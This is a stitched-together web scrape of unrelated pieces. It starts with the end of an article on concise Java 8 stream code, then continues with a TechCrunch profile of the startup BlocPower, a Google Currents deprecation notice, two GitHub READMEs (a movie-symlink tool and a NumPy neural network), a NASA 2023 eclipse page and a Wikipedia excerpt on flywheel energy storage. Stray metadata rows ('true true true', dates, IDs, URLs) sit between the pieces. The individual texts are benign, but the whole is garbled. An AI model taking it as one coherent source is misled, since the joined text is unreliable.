44.         String s = "The quick brown fox jumped over the lazy dog.";
45.         String sentence = s.toLowerCase().replaceAll("[^a-z ]", "");
46.
47.         List<String> words = asList(sentence.split(" "));
48.         List<String> letters = asList(sentence.split(""));
49.
50.         p("Sentence : " + sentence);
51.         p("Words : " + words.size());
52.         p("Letters : " + letters.size());
53.
54.         p("\nLetters : " + letters);
55.         p("Sorted : " + sort(letters));
56.         p("Unique : " + uniq(letters));
57.
58.         Map<String, Long> m = uniqueCount(letters);
59.         p("\nCounts");
60.
61.         p("letters");
62.         p(m.keySet().toString().replace(",", ""));
63.         p(m.values().toString().replace(",", ""));
64.
65.         p("\nwords");
66.         p(getWordsLongerThan(3, words));
67.         p(getWordLengthsLongerThan(3, words));
68.     }
69. }
```

Sample output from running the program:

```
Sentence : the quick brown fox jumped over the lazy dog
Words : 9
Letters : 44

Letters : t, h, e, , q, u, i, c, k, , b, r, o, w, n, , f, o, x, , j, u, m, p, e, d, , o, v, e, r, , t, h, e, , l, a, z, y, , d, o, g
Sorted : , , , , , , , , a, b, c, d, d, e, e, e, e, f, g, h, h, i, j, k, l, m, n, o, o, o, o, p, q, r, r, t, t, u, u, v, w, x, y, z
Unique : , a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, t, u, v, w, x, y, z

Counts
letters
 a b c d e f g h i j k l m n o p q r t u v w x y z
8 1 1 1 2 4 1 1 2 1 1 1 1 1 1 4 1 1 2 2 2 1 1 1 1 1

words
quick | brown | jumped | over | lazy
    5 |     5 |      6 |    4 |    4
```

The code has been shortened several different ways. Not all are possible in every version of Java, and not all are consistent with generally accepted style guides. Consider how this output would be obtained in earlier versions of Java. Several local variables would have been created to temporarily store data or serve as indexes. Numerous conditional statements and loops would be required to tell Java *how* to process the data. The newer functional approach is focused on *what* data is needed, and does not require attention related to temporary variables, nested loops, index management or conditional statement processing.

In some instances, standard Java syntax available since the earliest versions of the language was used to shorten the code at the expense of clarity. For instance, the import statement in line 1 references all classes in java.util rather than each individual class by name. The call to System.out.println is replaced with a call to a method named p to allow a shorter name on each method invocation (lines 9-11). These changes are controversial as they would violate some Java coding standards, but programmers from other backgrounds would not necessarily view them with any concern.
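To make the contrast concrete, here is a sketch (not part of the original listing) of how the counting step might look in pre-JDK 8 style, with a temporary variable, an explicit loop and mutable state doing the work of collect(groupingBy(identity(), counting())):

```java
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Pre-JDK 8 style: the "how" is spelled out step by step
static Map<String, Long> uniqueCountOldStyle(List<String> letters) {
    Map<String, Long> counts = new HashMap<String, Long>();
    for (String letter : letters) {
        Long current = counts.get(letter);              // temporary state
        counts.put(letter, current == null ? 1L : current + 1L);
    }
    return counts;
}
```

The result is the same map of characters to occurrence counts, but the reader must trace the loop and the null check to see that.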
In other cases, we take advantage of features that were not available in the earliest versions of the language, but have been available since pre-JDK 8. Static imports (lines 3-5) are used to reduce the number of class references needed inline. Regular expressions (lines 10, 45) effectively hide looping and conditionals in a manner unrelated to functional programming per se. These idioms, particularly the use of regular expressions, are often challenged for being difficult to read and interpret. Used judiciously, they reduce the amount of noise and restrict the amount of code that needs to be read and interpreted by a developer.

Finally, the code takes advantage of the new JDK 8 streaming API. A number of methods available in the streaming API are used to filter, group and process the lists (lines 17-40). Though their association with enclosing classes is clear within an IDE, it is less obvious unless you are already conversant with the API. This list explains where each of the method calls that appear in the code originates.

| Method | Origin |
| --- | --- |
| stream() | java.util.Collection.stream() |
| sorted() | java.util.stream.Stream.sorted() |
| collect() | java.util.stream.Stream.collect() |
| toList() | java.util.stream.Collectors.toList() |
| groupingBy() | java.util.stream.Collectors.groupingBy() |
| identity() | java.util.function.Function.identity() |
| counting() | java.util.stream.Collectors.counting() |
| filter() | java.util.stream.Stream.filter() |
| mapToInt() | java.util.stream.Stream.mapToInt() |
| mapToObj() | java.util.stream.IntStream.mapToObj() |

The uniq() (line 13) and sort() (line 17) methods reflect the functionality of the Unix utilities with the same name. sort() introduces the first call to a stream, which is sorted and then collected into a List. uniqueCount() (line 21) is analogous to uniq -c and returns a map in which each key is a character and each value is a count of the number of times that character appears.
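The uniq -c analogy can also be tried in isolation. A minimal sketch using the same collectors as the listing:

```java
import java.util.Arrays;
import java.util.List;
import java.util.Map;
import static java.util.function.Function.identity;
import static java.util.stream.Collectors.counting;
import static java.util.stream.Collectors.groupingBy;

List<String> letters = Arrays.asList("a", "b", "a", "c", "a");

// Group equal elements together and count each group, like `sort | uniq -c`
Map<String, Long> counts = letters.stream()
        .collect(groupingBy(identity(), counting()));
// counts maps "a" to 3, "b" to 1, and "c" to 1
```

groupingBy classifies each element by the key function (here identity, the element itself) and hands each group to the downstream counting() collector, so no explicit loop or counter variable appears anywhere.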
The two "getWords" methods (lines 26 and 33) filter out words that are shorter than a given length. In the case of getWordLengthsLongerThan(), additional method calls are used to format and convert the results into a final String. The code does not introduce any new concepts related to lambda expressions. The syntax introduced earlier is simply applied to specific uses of the Java streams API.

## Conclusion

The idea of writing less code to accomplish a given task is consistent with Einstein's idea to "make the irreducible basic elements as simple and as few as possible without having to surrender the adequate representation of a single datum of experience." This has been more popularly quoted as "Make things as simple as possible, but not simpler." Lambda expressions and the new streams API are often highlighted due to new possibilities to write simplified code that scales well. They contribute to the programmer's ability to properly simplify code to its best possible representation. Functional programming idioms are shorter by design, and with a little thought, there are many cases where Java code can be profitably made more succinct. The new syntax is unfamiliar but not overly complex. These new features clearly demonstrate that Java has moved far beyond its original goals as a language. It is now embracing some of the best functionality available in other programming languages and integrating it as its own.

## About the Author

**Casimir Saternos** has worked as a Software Developer, Database Administrator and Software Architect over the past 15 years. He has recently written and created a screencast on the R programming language. His articles on Java and Oracle Technologies have appeared in Java Magazine and on the Oracle Technology Network. He is the author of Client-Server Web Apps with JavaScript and Java, available from O'Reilly Media.
true
true
true
Unix pioneer Ken Thompson once said, “one of my most productive days was throwing away 1000 lines of code.” In this article Cas Saternos highlights practices now possible for writing concise Java code, with a special focus on the new functionality available in JDK 8. Shorter, more elegant code is possible due to the inclusion of Lambda Expressions in the language.
2024-10-12 00:00:00
2015-04-28 00:00:00
https://res.infoq.com/ar…limage/logo4.jpg
website
infoq.com
InfoQ
null
null
31,197,307
https://techcrunch.com/2022/04/28/blocpower-wants-to-evict-fossil-fuels-one-building-at-a-time/
BlocPower wants to evict fossil fuels one building at a time
Ron Miller
BlocPower founder Donnel Baird grew up in the Bedford-Stuyvesant neighborhood of Brooklyn in the 1980s. The area was so poor that buildings often lacked decent heating systems. People would turn on the stove or use electric heaters to compensate for ineffective central heating. It wasn’t safe or efficient, but it was reality for many families, most of whom were Black, living in these deficient buildings at the time. Baird says that the sense of inequity and inequality of the situation stuck with him. When he grew up, he recognized that the problem persisted in many poorer neighborhoods, impacting quality of life for the people living there as well as harming the broader environment. There was also another element at play. Many people living in these same neighborhoods faced a lack of decent jobs, fueling a cycle of poverty that was hard to break. Baird not only wanted to replace inefficient systems that burned fossil fuels, he also wanted to create high-quality, stable jobs for folks who were often left behind by the economy. He launched BlocPower in 2014 with the goal of replacing fossil fuel-burning heating and cooling systems with cleaner, more efficient electric air source heat pumps, water heaters and solar panels. As of January, BlocPower had updated more than 1,200 buildings in 26 cities, and the work continues. To this point, the company has raised over $100 million. That includes over $50 million from Goldman Sachs to help back the company’s green building financing, as well as a $30 million investment from Microsoft’s Climate Innovation Fund. In spite of this, he faced an uphill battle when it came to fundraising, and came perilously close to shutting the company’s doors in 2018. I spoke to Baird about the challenges he faced launching the business, especially as a Black founder, convincing the financial sector and venture capitalists to back his vision and get his idea off the ground.
## Building a greener alternative The roots of the idea for what became BlocPower began when Baird was working on a green jobs program in conjunction with the Obama-era Department of Energy. “My job was to act as outside intermediary between the Department of Energy and a bunch of labor unions and pension funds to figure out if we could co-invest labor union pension funds to create jobs, greening buildings using stimulus funding,” he explained. They hoped to put unemployed union members to work updating buildings, but the technology was much more expensive in this 2009 time frame, and it proved difficult to make the economics work for everyone. When Baird was in graduate school in 2014, he began to explore the idea of creating a financial instrument to make it easier for more people to update buildings with green energy systems, particularly in poorer neighborhoods. He felt that the lack of a purpose-built financial instrument to finance these projects was the missing piece in bringing his vision to life, but it required financial institutions to provide external investments in neighborhoods that most banks and financial services companies tended to steer clear of. “That’s when I realized if I was going to do green buildings in low-income communities, I’d have to do it myself. And while I was in business school, I began writing up a business plan and halfway through business school, Cheryl Dorsey, the president of Echoing Green Foundation, gave me $100,000 of seed capital, and I was able to launch the company while in my second year,” Baird said. The company makes money in a couple of different ways today, starting with the financial instrument he based the company on when he came up with the idea in 2014. “We borrow money from Wall Street. We purchase the equipment and we identify the local contractor who’s qualified to install it. And then we manage the project as they install that equipment in the building (getting project management fees as part of the deal). 
And we lease the equipment, just like you lease a car, to the building owner for 10 years or 15 years or 20 years. And so there’s a stream of lease payments that come back to our company from that building owner,” Baird explained. That flow of payments gives the company predictable, recurring revenue. In addition, governments and utilities hire companies like BlocPower to encourage and help building owners update their heating and cooling systems. “Utility companies and local governments have budgets, and so they will pay us for greening buildings in their community,” he said. As an example, the company has a contract with the city of Ithaca, New York, to make every building in town green. “Building electrification is a major part of Ithaca’s Green New Deal, one of the most aggressive decarbonization programs in New York State. The program will benefit Ithaca residents through job creation, lower energy costs, reduced pollution and greenhouse gas emissions, and more energy-efficient homes and buildings,” the company wrote in a statement announcing the deal. ## Getting off the ground As he built the company, he wanted to get that external investment to help drive it, but before that could happen, he had to come up with a proof of concept, and the way he was able to do that was with some government contracts. The first was a $2 million grant from the Department of Energy. He also would close a $6 million, three-year deal in 2017 with New York City, but he found getting financial institutions involved proved more challenging. The company was able to take the grant monies from NYC and the Department of Energy and really show that with proper financial backing, it could begin to have a real impact greening buildings. “So we had a $2 million contract with the Department of Energy that my startup won in a competitive process. 
We used that money to construct a real-world portfolio of actual clean energy projects by greening like 40 buildings, and then we were able to submit the data that we generated to Goldman Sachs to see that our financial models were tracking with what we were seeing in the real world,” he said. As the company wrote in a report on the NYC project, which was called Community Retrofit NYC, it concentrated in poor areas in Brooklyn and Queens where the startup could work with the utility companies to help identify buildings that needed updating in these areas: BlocPower’s strategy was to engage community stakeholders who completed projects to refer building owners to the Community Retrofit NYC with a focus in areas with the most robust Con Edison incentives. The second step was to use data to build a targeting score to identify buildings in need of upgrades. Targeting, in partnership with leveraging existing relationships, allowed us to connect to building owners in need of upgrades. It also allowed us to build a persona of who our average building owner looks like. The original plan called for BlocPower to work with 554 properties, where it would initiate or ideally complete a project, but it was actually able to complete projects on 629 buildings over the three-year contractual period from 2017-2019, according to the company. It was able to make progress in a few key ways. First of all, once it got some building owners involved, there was a big word of mouth effect, and that helped get more owners on board. Secondly, using the company’s proprietary software, the team was able to identify buildings most in need of updating. Finally the startup also created a much more streamlined approach to project management using a digital model. 
“What building a digital model of the building allows us to do is basically create one web page, where we have the digital model of the building and all of its data, and we could integrate all of the disparate pieces of electrical engineering, mechanical engineering, construction and financial data into one digital profile for that building. That allows us to figure out what the financial returns would be from investing in green energy in that building,” he said. Meanwhile, he raised a couple of tranches of money from Andreessen Horowitz and Kapor Capital. The first was for $1 million in 2015 just after he started the company. The next was a $2 million bridge round, which Baird says might have saved the company at a time when he was struggling. The two firms were instrumental in helping the company get started and then stay in business, he said. ## Pushing ahead With the portfolio of projects under his belt from the DoE and NYC programs, it began to pry open some doors with some big investors, but it wasn’t easy, and it took years for it to come together. But last year, Goldman Sachs Asset Management Urban Investment Group provided the company with more than $50 million to finance more green building projects. But he hasn’t been able to get other banks and financial institutions to go along, and the frustration of fundraising has never really gone away. He says the company has 860 employees, a figure that includes almost 800 workers his company has trained to install green energy solutions. “They are our employees. We pay them, we supervise them, we project manage them. We do interesting projects, like we’ve decarbonized some churches and synagogues. We put solar panels on Rikers Island, the jail in New York City.” He says the latter project was particularly gratifying because some of the folks he hired had been incarcerated there at one time or another or knew people who were. 
“That was interesting because a lot of our workers have been locked up in Rikers Island, or had family members that had been locked up in Rikers Island, but they were able to go there and do something positive and get paid for working on Rikers Island,” he said. While he met people along the way who invested in his vision, he described fundraising in general as “horrific.” “I’ve had people get up and walk out of meetings. I’ve had people pull out their phone in the middle of my presentation and start checking it. I’ve had people lecture me on capitalism, and how BlocPower isn’t capitalist, and because we’re trying to help people, we’re never going to make any money.” And climate tech investors were no better, he said, with one in particular accusing Baird of outright lying when he presented the investor with data about his completed projects. He believes the only way to fix the financing problem is for people from underrepresented groups to gain capital and invest in one another. “We can’t wait around and hold our breath and say, ‘Oh George Floyd happened,’ so the venture capital category is going to follow through and change…They’re going to do what they do. Our job is to create a whole new cohort of people who can actually deliver the social impact change that we need, and deliver the change on climate that we need,” he said. In spite of the obstacles, BlocPower has come up with a way to make buildings more efficient, while creating good jobs and making life better in neighborhoods that are too often left behind, all while making money and doing right by the planet.
true
true
true
BlocPower launched in 2014 with the goal of replacing fossil fuel-burning heating and cooling systems with cleaner, more efficient green energy solutions.
2024-10-12 00:00:00
2022-04-28 00:00:00
https://techcrunch.com/w…?resize=1200,675
article
techcrunch.com
TechCrunch
null
null
4,707,696
https://plus.google.com/+ResearchatGoogle/posts/e7qgT37kd7j
New community features for Google Chat and an update on Currents
Google
Note: This blog post outlines upcoming changes to Google Currents for Workspace users. For information on the previous deprecation of Google+ for users with personal Google accounts, please see this post.

What's Changing

We are nearing the end of this transition. Beginning July 5, 2023, Currents will no longer be available. Workspace administrators can export Currents data using Takeout before August 8, 2023. Beginning August 8th, Currents data will no longer be available for download. Although we are saying goodbye to Currents, we continue to invest in new features for Google Chat, so teams can connect and collaborate with a shared sense of belonging. Over the last year, we've delivered features designed to support community engagement at scale, and will continue to deliver more. Here is a summary of the features, with additional details below:

This month, we're enabling new ways for organizations to share information across the enterprise with announcements in Google Chat. This gives admins controls to limit permissions for posting in a space, while enabling all members to read and react, helping ensure that important updates stay visible and relevant. Later this year, we plan to simplify membership management by integrating Google Groups with spaces in Chat, enable post-level metrics for announcements, and provide tools for Workspace administrators to manage spaces across their domain.

Announcements in Google Chat

Managing space membership with Google Groups

We've already rolled out new ways to make conversations more expressive and engaging, such as in-line threading to enable rich exploration of a specific topic without overtaking the main conversation, and custom emojis to enable fun, personal expression.

In-line threaded conversations

Discover and join communities with up to 8,000 members

We've also made it easier for individuals to discover and join communities of shared interest.
By searching in Gmail , users can explore a directory of available spaces covering topics of personal or professional interest such as gardening, pets, career development, fitness, cultural identity, and more, with the ability to invite others to join via link. Last year, we increased the size of communities supported by spaces in Chat to 8,000 members , and we are working to scale this in a meaningful way later this year. A directory of spaces in Google Chat for users to join. Our partner community is extending the power of Chat through integrations with essential third-party apps such as Jira, GitHub, Asana, PagerDuty , Zendesk and Salesforce . Many organizations have built custom workflow apps using low-code and no-code tools , and we anticipate that this number will continue to grow with the GA releases of the Chat API and AppSheet’s Chat app building capabilities later this year. For teams to thrive in this rapidly changing era of hybrid work, it’s essential to build authentic personal connections and a strong sense of belonging, no matter when or where individuals work. We will continue to make Google Chat the best option for Workspace customers seeking to build a community and culture for hybrid teams, with much more to come later this year. Who's impacted Admins and end users Why it’s important The transition from Currents to spaces in Google Chat removes a separate, siloed destination and provides organizations with a modern, enterprise-grade experience that reflects how the world is working today. Google Workspace customers use Google Chat to communicate about projects, share organizational updates, and build community. Recommended action Availability Spaces in Google Chat are available to all Google Workspace customers and users with personal Google Accounts. Resources
true
true
true
Note: This blog post outlines upcoming changes to Google Currents for Workspace users. For information on the previous deprecation of Googl...
2024-10-12 00:00:00
2023-04-12 00:00:00
https://blogger.googleus…_LINKS%20(2).png
article
googleblog.com
Google Workspace Updates
null
null
11,363,070
https://github.com/Kraymer/flinck
GitHub - Kraymer/flinck: Sort your movies on filesystem by dates, ratings, etc using symlinks.
Kraymer
/flingk/ 1. *verb tr.* to create a symlink to a movie (flick) 2. *n.* CLI tool to organize your movies into a browsable directory tree offering fast access by dates, imdb ratings, etc.

- smart extraction of the movie name from its folder/file, using the OMDB api to fetch infos
- sane, limited set of configuration options, yet a highly flexible resulting directory structure
- possible to split links into alphabetical buckets (A-C, D-F, etc.) for large libraries

flinck is written for Python 2.7 and Python 3. Install with pip via the `pip install flinck` command. If you're on Windows and don't have pip yet, follow this guide to install it.

```
Usage: flinck.py [OPTIONS] FILE|DIR

  Organize your movie collection using symbolic links.

Options:
  -l, --link_dir PATH  Links root directory
  -b, --by [country|decade|director|genre|rating|runtime|title|year]
                       Organize medias by...
  -v, --verbose
  --version            Show the version and exit.
  -h, --help           Show this message and exit.

Example: flinck -l ./ --by genre --by rating ~/Movies
```

More infos on the documentation website.

Example `~/.config/flinck/config.yaml` corresponding to the screenshot above:

```
link_root_dir: '/Volumes/Disque dur/Movies'
genre:
    dirs: true
    buckets: true
rating:
    link_format: %rating-%year-%title
    dirs: false
    buckets: true
decade:
    dirs: true
```

Available on the Github Releases page. Want to know when new releases are shipped? Subscribe to the Versions rss feed. Please submit bugs and feature requests on the Issue tracker.
true
true
true
Sort your movies on filesystem by dates, ratings, etc using symlinks. - Kraymer/flinck
2024-10-12 00:00:00
2016-03-20 00:00:00
https://opengraph.githubassets.com/b48c194d079dfe0ab103051b87fa4da7c0f9a50110736223b9ee1225d1fce3bf/Kraymer/flinck
object
github.com
GitHub
null
null
5,451,014
http://www.techrepublic.com/downloads/quick-reference-linux-commands/172482
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
37,877,618
https://science.nasa.gov/eclipses/future-eclipses/eclipse-2023/
2023 Annular Eclipse - NASA Science
null
# 2023 Solar Eclipse

An annular solar eclipse will cross North, Central, and South America. This eclipse will be visible for millions of people in the Western Hemisphere.

## On Oct. 14, Experience the Eclipse

Join NASA experts for a live broadcast of the annular solar eclipse. Want to see more? At the link below, viewers can tune in on Oct. 14 for telescope livestreams across the path, rocket launches during the eclipse, and a broadcast in Spanish.

On Oct. 14, 2023, an annular solar eclipse will cross North, Central, and South America. Visible in parts of the United States, Mexico, and many countries in South and Central America, millions of people in the Western Hemisphere can experience this eclipse. During an annular eclipse, it is never safe to look directly at the Sun without specialized eye protection designed for solar viewing. Review these safety guidelines to prepare for Oct. 14, 2023.

## Safety

It is never safe to look directly at the Sun during an annular eclipse without wearing solar viewing or eclipse glasses. The Sun is never completely blocked by the Moon during an annular solar eclipse. Therefore, during an annular eclipse, it is never safe to look directly at the Sun without specialized eye protection designed for solar viewing. You can also use an indirect viewing method, such as a pinhole projector.

## What to Expect on Oct. 14

An annular solar eclipse happens when the Moon passes between the Sun and Earth while it is at its farthest point from Earth. Because the Moon is farther away from Earth, it appears smaller than the Sun and does not completely cover the star. This creates a "ring of fire" effect in the sky.

## Where & When Can I View the Annular Solar Eclipse?

On Oct. 14, 2023, the annular eclipse will begin in the United States, traveling from the coast of Oregon to the Texas Gulf Coast. Weather permitting, the annular eclipse will be visible in Oregon, Nevada, Utah, New Mexico, and Texas, as well as some parts of California, Idaho, Colorado, and Arizona. The annular eclipse will continue on to Central America, passing over Mexico, Belize, Honduras, and Panama. In South America, the eclipse will travel through Colombia before ending off the coast of Natal, Brazil, in the Atlantic Ocean.

## Meet the Creators of NASA's Newest Eclipse Art

To celebrate the special role of eclipses in connecting art and science, creatives across NASA will be sharing their eclipse-inspired…

## More Ways to Experience the Eclipse

### Citizen Science

Observing a solar eclipse is just one of many ways to get in on the fun of doing science – you can get involved with NASA science by participating in citizen science projects.

### Resources

From downloadable posters to coloring sheets, and videos to interactive demos, there are tons of fun ways for the whole family to experience eclipses.

### Heliophysics Big Year

The annular solar eclipse kicks off the Heliophysics Big Year – a global celebration of solar science and the Sun's influence on Earth and the entire solar system.
true
true
true
On Oct. 14, 2023, an annular solar eclipse will cross North, Central, and South America. Visible in parts of the United States, Mexico, and many countries in South and Central America, millions of people in the Western Hemisphere can experience this eclipse. During an annular eclipse, it is never safe to look directly at the […]
2024-10-12 00:00:00
2022-10-12 00:00:00
https://science.nasa.gov…l_1-3.jpg?w=1024
null
nasa.gov
science.nasa.gov
null
null
38,565,489
https://pylaunch.com
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
18,756,832
https://github.com/ahmedbesbes/Neural-Network-from-scratch
GitHub - ahmedbesbes/Neural-Network-from-scratch: Ever wondered how to code your Neural Network using NumPy, with no frameworks involved?
Ahmedbesbes
In this repository, I will show you how to build a neural network from scratch (yes, in plain Python code with no framework involved) that trains by mini-batches using gradient descent. Check **nn.py** for the code.

In the related notebook **Neural_Network_from_scratch_with_Numpy.ipynb** we will test nn.py on a set of non-linear classification problems:

- We'll train the neural network for some number of epochs and some choice of hyperparameters
- Plot a live/interactive decision boundary
- Plot the train and validation metrics such as the loss and the accuracies

nn.py is a toy neural network that is meant for educational purposes only, so there's room for a lot of improvement if you want to pimp it. Here are some guidelines:

- Implement a different loss function, such as the binary cross-entropy loss. For a classification problem, this loss works better than a mean square error.
- Make the code generic regarding the activation functions so that we can choose any function we want: ReLU, sigmoid, tanh, etc.
- Try to code other optimizers: SGD is good, but it has some limitations: sometimes it can get stuck in local minima. Look into Adam or RMSProp.
- Play with the hyperparameters and check the validation metrics
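As a minimal sketch of what "training by gradient descent with no framework" means — this is not nn.py's code, just a single sigmoid neuron fitted with the mean-square-error loss that the guidelines above suggest replacing:

```python
import math, random

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def train(data, epochs=2000, lr=0.5):
    """Fit one sigmoid neuron p = sigmoid(w*x + b) by gradient descent on MSE."""
    random.seed(0)
    w, b = random.random(), random.random()
    for _ in range(epochs):
        dw = db = 0.0
        for x, y in data:
            p = sigmoid(w * x + b)
            # chain rule: d(MSE)/dp = 2*(p - y),  dp/dz = p*(1 - p)
            g = 2.0 * (p - y) * p * (1.0 - p)
            dw += g * x
            db += g
        w -= lr * dw / len(data)   # average gradient over the batch
        b -= lr * db / len(data)
    return w, b

def mse(data, w, b):
    return sum((sigmoid(w * x + b) - y) ** 2 for x, y in data) / len(data)
```

On a toy 1-D threshold problem (negative inputs labeled 0, positive labeled 1), the loss drops close to zero — the same mechanics nn.py applies layer by layer with matrices.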
true
true
true
Ever wondered how to code your Neural Network using NumPy, with no frameworks involved? - ahmedbesbes/Neural-Network-from-scratch
2024-10-12 00:00:00
2018-12-24 00:00:00
https://repository-images.githubusercontent.com/163014938/88f38c80-3f69-11ea-926a-2f6d7305536e
object
github.com
GitHub
null
null
23,771,131
https://www.runnaroo.com/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
37,494,400
https://open.spotify.com/episode/0svOPYZBP7yvR2YKbmmL6I
From Virtualization to AI Integration // Lamia Youseff // # 175
null
# From Virtualization to AI Integration // Lamia Youseff // # 175 MLOps.community Sep 2023 52 min 6 sec MLOps Coffee Sessions #175 with Lamia Youseff, From Virtualization to AI Integration. // Abstract Lamia discusses how both Fortune 500 companies and SMBs lack the knowledge and capabilities to identify which use cases in their systems can benefit from AI integration. She emphasizes the importance of helping these companies integrate AI effectively and acquire the necessary capabilities to stay competitive in the market.
true
true
true
MLOps.community · Episode
2024-10-12 00:00:00
2023-09-12 00:00:00
https://i.scdn.co/image/ab6765630000ba8a3143cdda5609225b79c79117
music.song
spotify.com
Spotify
null
null
8,428,596
http://google.github.io/physical-web/
Walk up and use anything
null
The Physical Web is an open approach to enable quick and seamless interactions with physical objects and locations.

Everything is a tap away: walk up and interact with any object -- a parking meter, a toy, a poster -- or location -- a bus stop, a museum, a store -- without installing an app first. Interactions are only a tap away.

See what's useful around you: see web pages associated with the space around you. Choose the page most useful to you.

Any object or place can broadcast content: when anything can offer information and utility, the possibilities are endless.

How does this work? The Physical Web enables you to see a list of URLs being broadcast by objects in the environment around you. Any object can be embedded with a Bluetooth Low Energy (BLE) beacon, which is a low powered, battery efficient device that broadcasts content over bluetooth. Beacons that support the Eddystone protocol specification can broadcast URLs. Services on your device such as Google Chrome or Nearby Notifications can scan for and display these URLs after passing them through a proxy.

Explore the Physical Web in 3 easy steps:

1. Get beacons. On supported Android devices, you can use Beacon Toy to transform your phone into an Eddystone beacon. Otherwise, choose from a variety of beacon manufacturers.
2. Configure beacons. You'll have to select which URLs you'd like to broadcast (browsers such as Chrome and Nearby Notifications only support HTTPS) and how far and often you want your beacons to broadcast.
3. Deploy. Place your beacons in a physical space. Anyone who passes by with a Physical Web-compatible service will see your URL.
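The Eddystone-URL frame mentioned above packs a URL into at most 18 bytes using a one-byte scheme prefix and single-byte expansion codes for common substrings (tables taken from the Eddystone-URL specification). A minimal sketch of that compression step — the function name is mine, and the full BLE frame additionally carries a frame-type byte (0x10) and a TX-power byte before these encoded-URL bytes:

```python
SCHEMES = ["http://www.", "https://www.", "http://", "https://"]  # codes 0x00-0x03
EXPANSIONS = [".com/", ".org/", ".edu/", ".net/", ".info/", ".biz/", ".gov/",
              ".com", ".org", ".edu", ".net", ".info", ".biz", ".gov"]  # 0x00-0x0d

def encode_eddystone_url(url):
    """Compress a URL into the Eddystone-URL frame's encoded-URL bytes."""
    # match the longest scheme first so "https://www." wins over "https://"
    for code, scheme in sorted(enumerate(SCHEMES), key=lambda s: -len(s[1])):
        if url.startswith(scheme):
            out = bytearray([code])
            rest = url[len(scheme):]
            break
    else:
        raise ValueError("unsupported scheme")
    i = 0
    while i < len(rest):
        for code, exp in enumerate(EXPANSIONS):
            if rest.startswith(exp, i):
                out.append(code)       # one byte replaces the whole substring
                i += len(exp)
                break
        else:
            out.append(ord(rest[i]))   # plain ASCII character
            i += 1
    if len(out) > 18:
        raise ValueError("encoded URL exceeds 18 bytes")
    return bytes(out)
```

The tight 18-byte budget is why Physical Web deployments typically broadcast short URLs and let the proxy resolve redirects.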
true
true
true
Walk up and use anything
2024-10-12 00:00:00
null
null
null
null
null
null
null
11,626,875
https://en.wikipedia.org/wiki/Flywheel_energy_storage
Flywheel energy storage - Wikipedia
null
# Flywheel energy storage

**Flywheel energy storage** (**FES**) works by accelerating a rotor (flywheel) to a very high speed and maintaining the energy in the system as rotational energy. When energy is extracted from the system, the flywheel's rotational speed is reduced as a consequence of the principle of conservation of energy; adding energy to the system correspondingly results in an increase in the speed of the flywheel. Most FES systems use electricity to accelerate and decelerate the flywheel, but devices that directly use mechanical energy are being developed.[1]

Advanced FES systems have rotors made of high strength carbon-fiber composites, suspended by magnetic bearings, and spinning at speeds from 20,000 to over 50,000 rpm in a vacuum enclosure.[2] Such flywheels can come up to speed in a matter of minutes – reaching their energy capacity much more quickly than some other forms of storage.[2]

## Main components

A typical system consists of a flywheel supported by rolling-element bearings connected to a motor–generator. The flywheel and sometimes motor–generator may be enclosed in a vacuum chamber to reduce friction and energy loss. First-generation flywheel energy-storage systems use a large steel flywheel rotating on mechanical bearings. Newer systems use carbon-fiber composite rotors that have a higher tensile strength than steel and can store much more energy for the same mass.[3] To reduce friction, magnetic bearings are sometimes used instead of mechanical bearings.

### Possible future use of superconducting bearings

The expense of refrigeration led to the early dismissal of low-temperature superconductors for use in magnetic bearings. However, high-temperature superconductor (HTSC) bearings may be economical and could possibly extend the time energy could be stored economically.[4] Hybrid bearing systems are most likely to see use first.
High-temperature superconductor bearings have historically had problems providing the lifting forces necessary for the larger designs, but can easily provide a stabilizing force. Therefore, in hybrid bearings, permanent magnets support the load and high-temperature superconductors are used to stabilize it. The reason superconductors can work well stabilizing the load is because they are perfect diamagnets. If the rotor tries to drift off-center, a restoring force due to flux pinning restores it. This is known as the magnetic stiffness of the bearing. Rotational axis vibration can occur due to low stiffness and damping, which are inherent problems of superconducting magnets, preventing the use of completely superconducting magnetic bearings for flywheel applications.

Since flux pinning is an important factor for providing the stabilizing and lifting force, the HTSC can be made much more easily for FES than for other uses. HTSC powders can be formed into arbitrary shapes so long as flux pinning is strong. An ongoing challenge that has to be overcome before superconductors can provide the full lifting force for an FES system is finding a way to suppress the decrease of levitation force and the gradual fall of the rotor during operation caused by the flux creep of the superconducting material.

## Physical characteristics

### General

Compared with other ways to store electricity, FES systems have long lifetimes (lasting decades with little or no maintenance;[2] full-cycle lifetimes quoted for flywheels range from in excess of 10⁵, up to 10⁷, cycles of use),[5] high specific energy (100–130 W·h/kg, or 360–500 kJ/kg),[5][6] and large maximum power output. The energy efficiency (*ratio of energy out per energy in*) of flywheels, also known as round-trip efficiency, can be as high as 90%.
Typical capacities range from 3 kWh to 133 kWh.[2] Rapid charging of a system occurs in less than 15 minutes.[7] The high specific energies often cited for flywheels can be a little misleading, as commercial systems built have much lower specific energy, for example 11 W·h/kg, or 40 kJ/kg.[8]

### Form of energy storage

A flywheel stores energy as rotational kinetic energy:

E = ½ · I · ω²

Here I is the moment of inertia — the integral of the flywheel's mass weighted by the square of the distance from the axis of rotation — and ω is the angular velocity.

### Specific energy

The maximal specific energy of a flywheel rotor is mainly dependent on two factors: the first being the rotor's geometry, and the second being the properties of the material being used. For single-material, isotropic rotors this relationship can be expressed as[9]

E/m = K · (σ/ρ)

where

- E is the kinetic energy of the rotor [J],
- m is the rotor's mass [kg],
- K is the rotor's geometric shape factor [dimensionless],
- σ is the tensile strength of the material [Pa],
- ρ is the material's density [kg/m³].

#### Geometry (shape factor)

The highest possible value for the shape factor[10] of a flywheel rotor is K = 1, which can be achieved only by the theoretical *constant-stress disc* geometry.[11] A constant-thickness disc geometry has a shape factor of K = 0.606, while for a rod of constant thickness the value is K = 0.333. A thin cylinder has a shape factor of K = 0.5. For most flywheels with a shaft, the shape factor is below or about K = 0.333. A shaft-less design[12] has a shape factor similar to a constant-thickness disc (K ≈ 0.6), which enables a doubled energy density.

#### Material properties

For energy storage, materials with high strength and low density are desirable. For this reason, composite materials are frequently used in advanced flywheels. The strength-to-density ratio of a material can be expressed in Wh/kg (or Nm/kg); values greater than 400 Wh/kg can be achieved by certain composite materials.

#### Rotor materials

Several modern flywheel rotors are made from composite materials.
